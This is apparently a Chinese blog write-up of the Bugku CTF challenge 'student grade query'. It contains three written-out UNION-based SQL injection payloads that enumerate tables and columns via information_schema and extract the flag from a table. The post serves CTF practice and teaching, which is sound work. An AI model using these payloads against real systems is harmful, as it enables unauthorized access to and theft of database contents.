美文网首页
Bugku 学生成绩查询

Bugku 学生成绩查询

作者: 失眠是真滴难受 | 来源:发表于2019-02-08 00:43 被阅读8次

打开网页之后,看到的是一个输入框,输入 id 可以查询成绩信息。看到输入,就先想到注入,试了个 and 1=1 就检测出存在 SQL 注入。


image.png
image.png

然后第一时间想的是拿 sqlmap 来扫,但是用 --forms 检测 post 注入,竟然提示我不存在注入??? WTF???

看来还是得靠双手致富啊

id=0' union select (select  group_concat(table_name) from information_schema.tables where table_schema=database()),version(),user(),4#
id=0' union select (select  group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='fl4g'),version(),user(),4#
id=0' union select(select skctf_flag from fl4g),version(),user(),4#

最后得到 flag 了


image.png

相关文章

  • Bugku 学生成绩查询

    打开网页之后,看到的是一个输入框,输入 id 可以查询成绩信息。看到输入,就先想到注入,试了个 and 1=1 就...

  • 亲历sql题分享

    1、 2、 3、 学生信息查询类 1、查询语文成绩大于数学成绩的学生学号。 2、查询平均成绩大于60份的同学的学号...

  • sql50题

    mysql经典问题四表查询(教师,学生,成绩,课程表)_小龙人的博客-CSDN博客_查询不同课程成绩相同的学生的学...

  • [源码和文档分享]基于JAVA和MYSQL数据库的学生成绩管理系

    一、需求分析 本系统是学生成绩管理系统,所以应该做到可以录入学生成绩,修改学生成绩,删除学生成绩,查询学生成绩,以...

  • sql

    sql语句:表【学生|科目|成绩】查询每个学生成绩最好的科目和成绩 参考:https://www.zhihu.co...

  • SQL干货篇之查询数据

    单表查询 只在一个表中查询数据 多表查询 同时查询多个表 说明:这是在学生表student和成绩表SC中查询成绩大...

  • 2019-01-10

    学生表 课程表 教师表 成绩表 1、查询"01"课程比"02"课程成绩高的学生的信息及课程分数 2、查询"01"课...

  • SQL02

    1:查询查询平均成绩大于70分的同学的学号和平均成绩 思路:先查询每一个学生的平均成绩,然后加上条件 大于70. ...

  • MySQL练习题(一)

    原始数据 查询练习 查询'001'课程比'002'课程成绩高的所有学生的学号 查询平均成绩大于60分的同学的学号和...

  • mongodb的curd

    创建一个学生信息表 2.插入十五条数据 查询所有的男生数据(只需要学生的姓名和年龄) 查询成绩几个的学生信息 查询...

网友评论

      本文标题:Bugku 学生成绩查询

      本文链接:https://www.haomeiwen.com/subject/jpcnsqtx.html